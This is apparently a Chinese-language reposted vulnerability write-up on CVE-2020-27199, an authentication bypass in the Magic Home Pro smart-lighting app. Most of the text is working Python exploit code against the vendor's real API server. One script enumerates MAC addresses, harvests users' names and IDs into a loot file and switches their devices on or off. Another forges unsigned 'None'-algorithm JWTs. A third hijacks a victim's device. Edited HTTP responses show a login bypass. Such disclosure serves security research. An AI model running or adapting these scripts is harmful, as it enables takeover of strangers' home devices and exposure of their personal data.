溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Magic Home Pro身份認(rèn)證繞過漏洞CVE-2020-27199的示例分析

發(fā)布時(shí)間:2021-12-28 11:52:04 來源:億速云 閱讀:211 作者:小新 欄目:安全技術(shù)

這篇文章主要介紹Magic Home Pro身份認(rèn)證繞過漏洞CVE-2020-27199的示例分析,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

前期準(zhǔn)備工作

一臺(tái)已Root的Android手機(jī);

JAR重新簽名,重新構(gòu)建APK;

Frida證書綁定繞過;

漏洞簡報(bào)

受影響應(yīng)用:Magic Home Pro

產(chǎn)品廠商:JadeHomic

WiFi控制器產(chǎn)品廠商:Suzhou SmartChip Semiconductor Co.,Ltd

廠商官網(wǎng):JadeHomic

受影響產(chǎn)品代碼:Magic Home Pro

漏洞介紹

該漏洞將允許任何經(jīng)過身份驗(yàn)證的用戶使用其當(dāng)前授權(quán)級(jí)別,通過調(diào)用/app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address> API來查詢與其注冊(cè)產(chǎn)品無關(guān)的終端節(jié)點(diǎn)。這將導(dǎo)致服務(wù)器端返回響應(yīng)信息 并指示目標(biāo)節(jié)點(diǎn)是否存在,然后返回相關(guān)節(jié)點(diǎn)的用戶名、用戶唯一標(biāo)識(shí)符(userUniID)和綁定唯一ID(bindedUniID)。

通過執(zhí)行上述查詢請(qǐng)求,攻擊者就可以利用指向/app/sendCommandBatch/ZG001 API的未授權(quán)POST請(qǐng)求、新枚舉的Mac地址和兼容的十六進(jìn)制命令71230fa3(ON)及71240fa4(OFF)來向遠(yuǎn)程節(jié)點(diǎn)發(fā)送命令了。

JWT偽造

初始枚舉完成后,攻擊者還可以使用JWT Payload數(shù)據(jù)中的userID和uniID偽造JWT,本質(zhì)上來說應(yīng)該是可以將令牌降級(jí)為使用JWT Header字段中的“None”算法(簽名繞過漏洞)。在該漏洞的幫助下,攻擊者將能夠通過向/app/shareDevice/ZG001發(fā)起遠(yuǎn)程API調(diào)用并使用friendUserID這個(gè)JSON參數(shù)來將目標(biāo)設(shè)備添加至攻擊者的設(shè)備列表中,從而實(shí)現(xiàn)攻擊,此時(shí)攻擊者將能夠完全獲取目標(biāo)設(shè)備的控制權(quán)限。

漏洞類型

繞過身份驗(yàn)證

信息披露

未經(jīng)授權(quán)的訪問

橫向權(quán)限提升

攻擊向量

需要經(jīng)過身份驗(yàn)證的用戶

現(xiàn)有終端系統(tǒng)的成功枚舉

隨后將批處理命令發(fā)送到遠(yuǎn)程節(jié)點(diǎn)

設(shè)備接管

繞過身份驗(yàn)證

節(jié)點(diǎn)枚舉和批處理命令漏洞利用PoC

我們的PoC將返回MAC地址范圍內(nèi)的最后字節(jié)進(jìn)行枚舉并返回結(jié)果,如果你需要的話,你也可以測(cè)試“遠(yuǎn)程執(zhí)行”的效果。

import requests

import json

import os

from colorama import init

from colorama import Fore, Back, Style

import re

 

'''

First Stage Authentication
Second Stage Enumerate
Third Stage Remote Execute

'''

 

global found_macaddresses

found_macaddresses = []

global outtahere

outtahere = ""

q = "q"

global token

 

 

def turnOn(target, token):

 

    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"

    array = {

        "dataCommandItems":[

            {"hexData":"71230fa3","macAddress":target}

        ]

    }

    data = json.dumps(array)

    headersOn = {

        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",

        "Accept-Language": "en-US",

        "Accept": "application/json",

        "Content-Type": "application/json; charset=utf-8",

        "token":token,

        "Host": "wifij01us.magichue.net",

        "Connection": "close",

        "Accept-Encoding": "gzip, deflate"

    }

    print (Fore.WHITE + "[+] Sending Payload ...")

    response = requests.post(urlOn, data=data, headers=headersOn)

    if response.status_code == 200:

        if "true" in response.text:

            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")

        else:

            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

 

def turnOff(target, token):

 

    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"

    array = {

        "dataCommandItems":[

            {"hexData":"71240fa4","macAddress":target}

        ]

    }

    data = json.dumps(array)

    headersOff = {

        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",

        "Accept-Language": "en-US",

        "Accept": "application/json",

        "Content-Type": "application/json; charset=utf-8",

        "token":token,

        "Host": "wifij01us.magichue.net",

        "Connection": "close",

        "Accept-Encoding": "gzip, deflate"

    }

    print (Fore.WHITE + "[+] Sending Payload ...")

    response = requests.post(urlOff, data=data, headers=headersOff)

    if response.status_code == 200:

        if "true" in response.text:

            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")

        else:

            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

 

def lighItUp(target, token):

 

    outtahere = ""

    q = "q"

    if len(str(target)) < 12:

        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)

    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):

        while outtahere.lower() != q.lower():

            if outtahere == "0":

                turnOn(target, token)

            elif outtahere == "1":

                turnOff(target, token)

            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

 

def Main():

    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

 

    data = {

        "userID":"<Valid Registered Email/Username>",

        "password":"<Valid Registered Password>",

        "clientID":""

    }

 

    headersAuth = {

        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",

        "Accept-Language": "en-US",

        "Accept": "application/json",

        "Content-Type": "application/json; charset=utf-8",

        "Host": "wifij01us.magichue.net",

        "Connection": "close",

        "Accept-Encoding": "gzip, deflate"

    }

 

    # First Stage Authenticate

 

    os.system('clear')

    print (Fore.WHITE + "[+] Authenticating ...")

    response = requests.post(urlAuth, json=data, headers=headersAuth)

    resJsonAuth = response.json()

    token = (resJsonAuth['token'])

 

    # Second Stage Enumerate

 

    print (Fore.WHITE + "[+] Enumerating ...")

    macbase = "C82E475DCE"

    macaddress = []

    a = ["%02d" % x for x in range(100)]

    for num in a:

        macaddress.append(macbase+num)

 

    with open('loot.txt', 'w') as f:

        for mac in macaddress:

            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"

            params = {

                "macAddress":mac

            }

 

            headersEnum = {

                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",

                "Accept-Language": "en-US",

                "Content-Type": "application/json; charset=utf-8",

                "Accept": "application/json",

                "token": token,

                "Host": "wifij01us.magichue.net",

                "Connection": "close",

                "Accept-Encoding": "gzip, deflate"

            }

 

            response = requests.get(urlEnum, params=params, headers=headersEnum)

            resJsonEnum = response.json()

            data = (resJsonEnum['data'])

            if not data:

                pass

            elif data:

                found_macaddresses.append(mac)

                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")

                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")

            else:

                print (Fore.RED + "[-] No results found!")

                print(Style.RESET_ALL)

 

        if not found_macaddresses:

            print (Fore.RED + "[-] No MAC addresses retrieved")

        elif found_macaddresses:

            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)

            if (attackboolean.upper() == 'Y'):

                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)

                lighItUp(target, token)

            elif (attackboolean.upper() == 'N'):

                print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)

            else:

                print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

 

if __name__ == "__main__":

Main()

枚舉結(jié)果

Magic Home Pro身份認(rèn)證繞過漏洞CVE-2020-27199的示例分析

令牌偽造PoC

攻擊者可以使用枚舉成功后返回的userID和uniqID,并利用這個(gè)令牌偽造PoC來生成一個(gè)新的已簽名令牌并繞過JWT。

#!/usr/local/bin/python3

 

import url64

import requests

import json

import sys

import os

from colorama import init

from colorama import Fore, Back, Style

import re

import time

from wsgiref.handlers import format_date_time

from datetime import datetime

from time import mktime

 

now = datetime.now()

stamp = mktime(now.timetuple())

 

'''

HTTP/1.1 200

Server: nginx/1.10.3

Content-Type: application/json;charset=UTF-8

Connection: close

 

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"

'''

 

def Usage():

    print (f"Usage: {sys.argv[0]} <username> <unique id>")

 

def Main(user, uniqid):

    os.system('clear')

    print ("[+] Encoding ...")

    print ("[+] Bypass header created!")

    print ("HTTP/1.1 200")

    print ("Server: nginx/1.10.3")

    print ("Date: "+str(format_date_time(stamp))+"")

    print ("Content-Type: application/json;charset=UTF-8")

    print ("Connection: close\r\n\r\n")

 

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'

    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'

    jwt_headerEncoded = url64.encode(jwt_header.strip())

    jwt_dataEncoded = url64.encode(jwt_data.strip())

    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")

    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

 

if __name__ == "__main__":

    if len(sys.argv) < 3:

        Usage()

    else:

        Main(sys.argv[1], sys.argv[2])

設(shè)備接管PoC

攻擊者可以利用該漏洞并使用攻擊者的郵件(用于接管目標(biāo)帳戶的注冊(cè)帳戶)、目標(biāo)用戶郵件(要接管的目標(biāo)帳戶)、目標(biāo)設(shè)備Mac地址(與目標(biāo)電子郵件地址關(guān)聯(lián))和偽造的令牌來接管目標(biāo)設(shè)備。

#!/usr/local/bin/python3

 

import url64

import requests

import json

import sys

import os

from colorama import init

from colorama import Fore, Back, Style

import re

 

def Usage():

    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")

 

def Main():

 

    attacker_email = sys.argv[1]

    target_email = sys.argv[2]

    target_mac = sys.argv[3]

    forged_token = sys.argv[4]

 

    os.system('clear')

    print (Fore.WHITE + "[+] Sending Payload ...")

    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

 

    array = {"friendUserID":attacker_email, "macAddress":target_mac}

 

    data = json.dumps(array)

 

    headers = {

        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",

        "Accept-Language": "en-US",

        "Accept": "application/json",

        "Content-Type": "application/json; charset=utf-8",

        "token":forged_token,

        "Host": "wifij01us.magichue.net",

        "Connection": "close",

        "Accept-Encoding": "gzip, deflate"

    }

    

    response = requests.post(url, data=data, headers=headers)

    if response.status_code == 200:

        if "true" in response.text:

            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)

        else:

            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

 

if __name__ == "__main__":

    if len(sys.argv) < 5:

        Usage()

    else:

        Main()

成功的POST請(qǐng)求/響應(yīng)交換樣例

POST Request

 

POST /app/shareDevice/ZG001 HTTP/1.1

User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)

Accept-Language: en-US

Accept: application/json

token: <forged token, representing the target victim>

Content-Type: application/json; charset=utf-8

Content-Length: 72

Host: wifij01us.magichue.net

Connection: close

Accept-Encoding: gzip, deflate

 

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

 

Response

 

HTTP/1.1 200

Server: nginx/1.10.3

Date: Tue, 07 Jul 2020 05:31:33 GMT

Content-Type: application/json;charset=UTF-8

Connection: close

Content-Length: 31

 

{"code":0,"msg":"","data":true}

認(rèn)證繞過(Magic Home Pro)(CVE-2020-27199)

利用JSON令牌偽造以及基于上述枚舉的收集信息(即目標(biāo)用戶的電子郵件、ClientID和UniqID),攻擊者可以通過篡改HTTP響應(yīng)繞過移動(dòng)應(yīng)用程序的身份驗(yàn)證過程,從而獲得應(yīng)用程序的非授權(quán)權(quán)限。

攻擊者利用目標(biāo)用戶的電子郵件地址、任意密碼和客戶端來以目標(biāo)用戶身份使用Magic Home Pro應(yīng)用程序。

然后,攻擊者可以使用步驟1中的詳細(xì)信息操作HTTP響應(yīng),該步驟將允許攻擊者實(shí)現(xiàn)身份認(rèn)證繞過。

Original HTTP Login Request via Magic Home Pro Mobile app

 

POST /app/login/ZG001 HTTP/1.1

User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)

Accept-Language: en-US

Accept: application/json

token:

Content-Type: application/json; charset=utf-8

Content-Length: 117

Host: wifij01us.magichue.net

Connection: close

Accept-Encoding: gzip, deflate

 

{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

 

Original HTTP Response

 

HTTP/1.1 200

Server: nginx/1.10.3

Date: Thu, 08 Oct 2020 00:08:45 GMT

Content-Type: application/json;charset=UTF-8

Connection: close

Content-Length: 37

 

{"code":10033,"msg":"Password error"}

 

Edited HTTP Response

 

HTTP/1.1 200

Server: nginx/1.10.3

Date: Mon, 06 Jul 2020 12:32:02 GMT

Content-Type: application/json;charset=UTF-8

Connection: close

Content-Length: 907

 

{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}

以上是“Magic Home Pro身份認(rèn)證繞過漏洞CVE-2020-27199的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對(duì)大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI